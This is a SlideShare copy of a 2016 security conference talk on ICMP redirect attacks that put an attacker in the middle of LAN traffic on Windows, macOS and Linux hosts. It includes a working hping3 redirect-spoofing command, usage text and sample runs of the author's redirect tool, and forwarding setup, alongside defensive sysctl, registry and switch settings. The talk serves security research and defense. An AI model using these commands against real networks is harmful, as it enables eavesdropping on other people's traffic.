SlideShare a Scribd company logo

Type=5, Code=1 (or Lady In The Middle)

β€’
β€’
D
DorotaKulas

The talk walks through Internet Control Message Protocol basics, focusing on Type=5, Code=1 messages. It briefly describes 'old' ICMP redirect attack and discuss the changes introduced to Linux kernel which made this attack impossible. But did they really? This talk shows that ICMP rediect attack is still easy to perform with some additional steps even if secure_redirects are configured. Successful attack results in a new entry in the targeted host routing table. A testing tool and its capabilities are introduced. The talk also describes prevention steps to secure the environment.

Technology
1 of 38
Download to read offline
Hack in Paris 2016
Disclaimer: Opinions expressed in this presentation are my own and do not represent those of my employer
3 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Poland Dorota Kulas Senior Red Teamer 15 years in IT 5 years security focused
4 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 An attacker may assume the MITM position by altering The Routing Table
5 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž First defined in RFC 792 in 1981 ο‚ž ISO/OSI Layer 3* ο‚ž Designed to provide feedback about problems in the communication environment ο‚ž ICMP messages typically report errors in the processing of IP datagrams ο‚ž These messages are directed to the source IP address of the originating packet*
6 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Internet Protocol Header 8 Bytes of Next Header Type Code Checksum (different purposes)
7 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Internet Header + 64 bits of Data Datagram The internet header plus the first 64 bits of the original datagram's data. This data is used by the host to match the message to the appropriate process. If a higher level protocol uses port numbers, they are assumed to be in the first 64 data bits of the original datagram's data. RFC 792
8 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 1 2 3 4 2a (ICMP Type=5, Code=1)
9 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 1 2 3
10 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 3 1 2
11 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Attack works up to Windows XP ο‚ž Versions earlier than Yosemite (10.10.3) – attack works (untested; see CVE-2015-1103) ο‚ž Attack works for kernel versions prior to 2.6.38 root@attacker# hping3 -I <iface> -C 5 -K 1 -c <count> -a <current_gw> --icmp-ipdst <target> --icmp-gw <attacker> --icmp- ipsrc <victim> <victim>
12 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Changes introduced with 3.6.x kernels ο‚ž Checking if redirect packet OS received really comes from current (old) gateway for particular destination IP address ο‚ž Started using FIB instead of routing table (ip route list table local|main) ο‚ž ICMP redirects previously were handled in icmp.c, now redirect is being delivered and handled in respective protocols modules ο‚ž Redirects are validated using 8-byte part of embedded header
13 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Checking if redirect packet OS received really comes from current (old) gateway for particular destination IP address and using FIB instead of the routing table 682 if (rt->rt_gateway != old_gw) 683 return; 684 705 n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw); 706 if (n) { 707 if (!(n->nud_state & NUD_VALID)) { 708 neigh_event_send(n, NULL); 709 } else { 710 if (fib_lookup(net, fl4, &res) == 0) { 711 struct fib_nh *nh = &FIB_RES_NH(res); 712 713 update_or_create_fnhe(nh, fl4->daddr, new_gw, 714 0, 0); 715 } 716 if (kill_route) 717 rt->dst.obsolete = DST_OBSOLETE_KILL; 718 call_netevent_notifiers(NETEVENT_NEIGH_UPDATE, n); 719 } 720 neigh_release(n); 721 } 722 return;
14 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Handling ICMP redirect in TCP module diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c (…) +static void do_redirect(struct sk_buff *skb, struct sock *sk) +{ + struct dst_entry *dst = __sk_dst_check(sk, 0); + + if (dst && dst->ops->redirect) + dst->ops->redirect(dst, skb); +} + (…) switch (type) { + case ICMP_REDIRECT: + do_redirect(icmp_skb, sk); + goto out; diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c (…) - ip_rt_redirect(skb, icmp_hdr(skb)->un.gateway); icmp_socket_deliver(skb, icmp_hdr(skb)->un.gateway); }
15 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Internet Header + 64 bits of Data Datagram The internet header plus the first 64 bits of the original datagram's data. This data is used by the host to match the message to the appropriate process. If a higher level protocol uses port numbers, they are assumed to be in the first 64 data bits of the original datagram's data. RFC 792
16 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 2 2 4 1 3 5
17 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Version IHL DSCP |ECN Flags Version IHL DSCP |ECN Flags 8 Bytes of Next Header Header ChecksumProtocolTTL Total Length ID Fragment Offset Source IP Address Destination IP Address Gateway Internet Address Type Code Checksum Total Length ID Source IP Address Destination IP Address TTL Protocol Header Checksum Fragment Offset 2 3
18 Type=5, Code=1 – Hack in Paris 2016 01/07/2016
19 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 = Default GW = User = Attacker = User = Remote Server = 5 = 1
20 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 = User = Remote Server = Remote Server = User 2 1
21 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž TCP ο‚ž UDP ο‚ž ICMP Echo Request/Reply Source Port Destination Port Sequence Number Source Port Destination Port Length Checksum Identifier Sequence Number Type=8 Code=0 Header Checksum Which of these can an attacker control? (check other protocols too)
22 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž ICMP Echo Request/Reply Identifier Sequence Number Type=8 Code=0 Header Checksum $ sudo tshark -n icmp 5 18.511051 10.10.100.39 -> 10.10.100.254 ICMP 98 Echo (ping) request id=0x9ea0, seq=0/0, ttl=64 6 18.511307 10.10.100.254 -> 10.10.100.39 ICMP 98 Echo (ping) reply id=0x9ea0, seq=0/0, ttl=64 (request in 5) $ pgrep ping 41118 >>> hex(41118) β€˜0xa09e’
23 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Windows 7 – Attacker uses packet with appropriate (any) trigger ο‚ž Yosemite – In default configuration currently unable to exploit Kernels ο‚ž 2.6.38 – 3.5.x – packet with trigger (any) ο‚ž 3.6.x – 4.6.0 – packet with trigger (udp) ο‚ž All kernels except for 3.6.x – packet with trigger (icmp)
24 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Prepare to route a lot of traffic through your host ο‚ž Permit IP forwarding and prepare forwarding rules as needed
25 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Linux / Android ο‚ž Windows ο‚ž Mac OS X sudo sysctl -w net.ipv4.ip_forward=1 Or, as root echo 1 > sysctl -w net.ipv4.ip_forward=1 sudo sysctl -w net.inet.ip.forwarding=1 Reboot required: reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters /v IpEnableRouter /t REG_DWORD /d 1 /f Or (reboot not required): sc start "RemoteAccess"
26 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 (A) (V) | | +--+--+ | (G) | (T) Usage: Script will send an ICMP recirect message (or, in fact, couple of network packets, in some cases in a loop). This is to introduce a new route entry to the attacked system. Victim (V) is other host within the same LAN segment (or L2 domain). Victim communicates to the target (T), and this is the connection attacker (A) wants to eavesdrop. The other piece attacker needs to know is default gateway (G) of the victim, typically it will be the same router that is attacker’s default gateway. For TCP, it is the best to choose port which is closed on the victim machine, as sequence number in response when the RST flag is set is always 0. For UDP, there's netbios_ns query implemented, it is the best when victim actually listens for these queries (most of windows machines do). The best approach is to use ICMP. Use other options if ICMP is not working. Example: redirect –A 10.10.10.12 –V 10.10.10.16 –T 4.4.4.4 –G 10.10.10.1
27 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Usage: redirect.go -A string [optional] attacker IP address (your primary network interface IP address by default) -D [optional] debug mode - very verbose -G string [required] IP address of the default gatway -T string [required] IP address of the target (may be on remote network) -V string [required] IP address of the victim (on the same LAN segment as an attacker) -c int [optional] clean up: 1 - set route back to default gw -cpuprofile string Where to write CPU profile -d int [optional] destination port of trigger packet (default 53) -f [optional] do not spoof source MAC address -i string [optional] interface to use -l float [optional] send packets in a loop at <number> interval (in seconds) -n int [optional] send number of packets if sending in a loop. Set it to -1 to send continously (this is the default) (default -1) -p [optional] send a redirect based on a ICMP trigger / ping (this is the default) (default true) -q [optional] quiet mode - won't print any messages -s int [optional] source port of trigger packet -t [optional] send a redirect based on a TCP trigger -u [optional] send a redirect based on a UDP trigger -x [optional] skip trigger
28 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 attacker$ sudo redirect –D -V 10.10.100.19 -G 10.10.100.254 -T 4.4.4.4 2015/09/04 17:45:57 Preparing packet from 10.10.100.254 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) 2015/09/04 17:45:57 Preparing packet from 4.4.4.4 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) Sending packets (will be redirecting to 10.10.100.5): i.r. victim$ sudo tshark –n –f icmp Capturing on 'eth0' 1 4.4.4.4 10.10.100.19 ICMP 60 0.000000 Echo (ping) request id=0x1756, seq=1/256, ttl=64 2 10.10.100.19 4.4.4.4 ICMP 60 0.001161 Echo (ping) reply id=0x1756, seq=1/256, ttl=64 (request in 1) 3 10.10.100.254 10.10.100.19 ICMP 70 0.000646 Redirect (Redirect for host) victim$ ip route get 4.4.4.4 4.4.4.4 via 10.10.100.5 dev eth0 src 10.10.100.19 cache <redirected>
29 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 attacker$ sudo redirect –D -V 10.10.100.19 -G 10.10.100.254 -T 4.4.4.4 –c 1 2015/09/04 17:47:18 Preparing packet from 10.10.100.5 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) 2015/09/04 17:47:18 Preparing packet from 4.4.4.4 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) Sending packets (will be redirecting to 10.10.100.254): i.r. victim$ sudo tshark –n –f icmp Capturing on 'eth0' 1 4.4.4.4 10.10.100.19 ICMP 60 0.000000 Echo (ping) request id=0x1856, seq=1/256, ttl=64 2 10.10.100.19 4.4.4.4 ICMP 60 0.001161 Echo (ping) reply id=0x1856, seq=1/256, ttl=64 (request in 1) 3 10.10.100.5 10.10.100.19 ICMP 70 0.000646 Redirect (Redirect for host) victim$ ip route get 4.4.4.4 4.4.4.4 via 10.10.100.254 dev eth0 src 10.10.100.19 cache <redirected>
30 Type=5, Code=1 – Hack in Paris 2016 01/07/2016
31 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 All OSes ο‚ž IP address of the gateway the compromised endpoint is used to communicate with target Linux kernels 3.6.x ο‚ž ongoing UDP communication between the compromised endpoint and the target, including source and destination ports
32 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž One-way MITM (traffic from compromised endpoint within your LAN to the target) – unless attacker implements NAT ο‚ž Attack only eligible within local subnet (but towards remote host outside of LAN)
33 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Linux / Android ο‚ž Windows ο‚ž Mac OS X sudo sysctl -w net.ipv4.conf.all.accept_redirects=0 sudo sysctl -w net.ipv6.conf.all.accept_redirects=0 Or, as root echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects sudo sysctl -w net.inet.icmp.drop_redirect=1 sudo sysctl -w net.inet.icmp.log_redirect=1 sudo sysctl –w net.inet6.icmp6.rediraccept=0 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesTcpipParameters Add value name EnableICMPRedirects, a type REG_DWORD entry, and set the data value to 0
34 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Cisco ο‚— Port Security (to limit and identify MAC addresses of the stations allowed to access the port) ο‚— DHCP Snooping (acts like a firewall between untrusted hosts and DHCP servers; will drop spoofed packets) ο‚— IP Source Guard (filters traffic based on the DHCP snooping binding database and on manually configured IP source bindings in order to restrict IP traffic on non- routed Layer 2 interfaces. IP source guard prevents IP/MAC spoofing)
35 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 RFCs ο‚ž 729 – Internet Control Message Protocol ο‚ž 1122 – Requirements for Internet Hosts -- Communication Layers ο‚ž 1812 – Requirements for IP Version 4 Routers ο‚ž 5927 – ICMP Attacks against TCP ο‚ž 6864 – Updated Specification of the IPv4 ID Field Links ο‚ž https://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex- icmp-redirect-attacks-in-the-wild/ ο‚ž https://support.apple.com/en-us/HT204659 ο‚ž http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608- 21.html#anc104
36 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Kernel commits that changed ICMP Redirects handling ο‚ž https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/diff/?id=55be7a9c6074f749d617a7fc1914 c9a23505438c ο‚ž https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/diff/?id=1f42539d257af671d56d4bdbcf13a ef31abff6ef ο‚ž https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/diff/?id=b42597e2f36e2043756aa7462fad df630962f061 ο‚ž https://git.kernel.org/cgit/linux/kernel/git/stable/linux- stable.git/commit/?id=791169e5924d35532443c9538e3ba0d49ef0de10 ο‚ž https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4895c771c7f006b4b90f9d6 b1d2210939ba57b38 ο‚ž http://article.gmane.org/gmane.linux.network/238256 Testing tool https://gitlab.com/litm/redirect Contact me dorotakulas (at) gmail
38 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Maciek is my brother. Few years ago, he was a happy young man in love, with dreams and plans for the future. This photo was taken a week before his accident. The accident happened in May 2013 and caused a swelling of the brain and hypoxia. The mortality rate for these injuries was set at 89%. The struggle for his life lasted more than two weeks. Maciek is a fighter – he survived. Unfortunately, he cannot move or speak. He is fed through a tube (PEG). Thanks to support of many people we were able to provide him a proper rehabilitation. Maciek made a great progress. He is now able to sit in a wheelchair, tries to eat with his mouth and makes first sounds. He communicates with us using eye movements. To further improve his abilities, we need a financial support for the rehabilitation and a rehabilitation equipment. Maciek is taken care of by my parents, 24x7. I’m helping as much as I can, also through spreading the information and asking for donations. http://maciejkulas.pl/en

Recommended

Social Engineering Case Study by Wasim Halani
Social Engineering Case Study by Wasim HalaniSocial Engineering Case Study by Wasim Halani
Social Engineering Case Study by Wasim Halani
n|u - The Open Security Community
Β 
Mobile application security and threat modeling
Mobile application security and threat modelingMobile application security and threat modeling
Mobile application security and threat modeling
Shantanu Mitra
Β 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
Β 
Mobile Application Security Code Reviews
Mobile Application Security Code ReviewsMobile Application Security Code Reviews
Mobile Application Security Code Reviews
Denim Group
Β 
Developing Secure Mobile Applications
Developing Secure Mobile ApplicationsDeveloping Secure Mobile Applications
Developing Secure Mobile Applications
Denim Group
Β 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
Β 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
Β 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest Workshop
Prathan Phongthiproek
Β 

Recommended

Social Engineering Case Study by Wasim Halani
Social Engineering Case Study by Wasim HalaniSocial Engineering Case Study by Wasim Halani
Social Engineering Case Study by Wasim Halani
n|u - The Open Security Community
Β 
Mobile application security and threat modeling
Mobile application security and threat modelingMobile application security and threat modeling
Mobile application security and threat modeling
Shantanu Mitra
Β 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
Β 
Mobile Application Security Code Reviews
Mobile Application Security Code ReviewsMobile Application Security Code Reviews
Mobile Application Security Code Reviews
Denim Group
Β 
Developing Secure Mobile Applications
Developing Secure Mobile ApplicationsDeveloping Secure Mobile Applications
Developing Secure Mobile Applications
Denim Group
Β 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
Β 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
Β 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest Workshop
Prathan Phongthiproek
Β 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
Β 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Edi Saputra
Β 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
apidays
Β 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
Β 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
Β 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Β 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
Β 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
DianaGray10
Β 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
Β 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Β 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
Β 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Khem
Β 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
Boston Institute of Analytics
Β 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
SynarionITSolutions
Β 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
Β 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Product Anonymous
Β 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
Β 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Martijn de Jong
Β 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
wesley chun
Β 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
Β 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Marius Sescu
Β 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Expeed Software
Β 

More Related Content

Recently uploaded

A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
Β 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
Β 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
Β 

Recently uploaded (20)

MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
Β 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Β 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Β 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Β 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Β 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Β 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Β 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Β 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
Β 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Β 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Β 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Β 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
Β 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
Β 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Β 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Β 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
Β 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Β 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
Β 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Β 

Featured

How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
Β 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
Β 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Search Engine Journal
Β 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
SpeakerHub
Β 

Featured (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Β 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Β 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
Β 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
Β 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
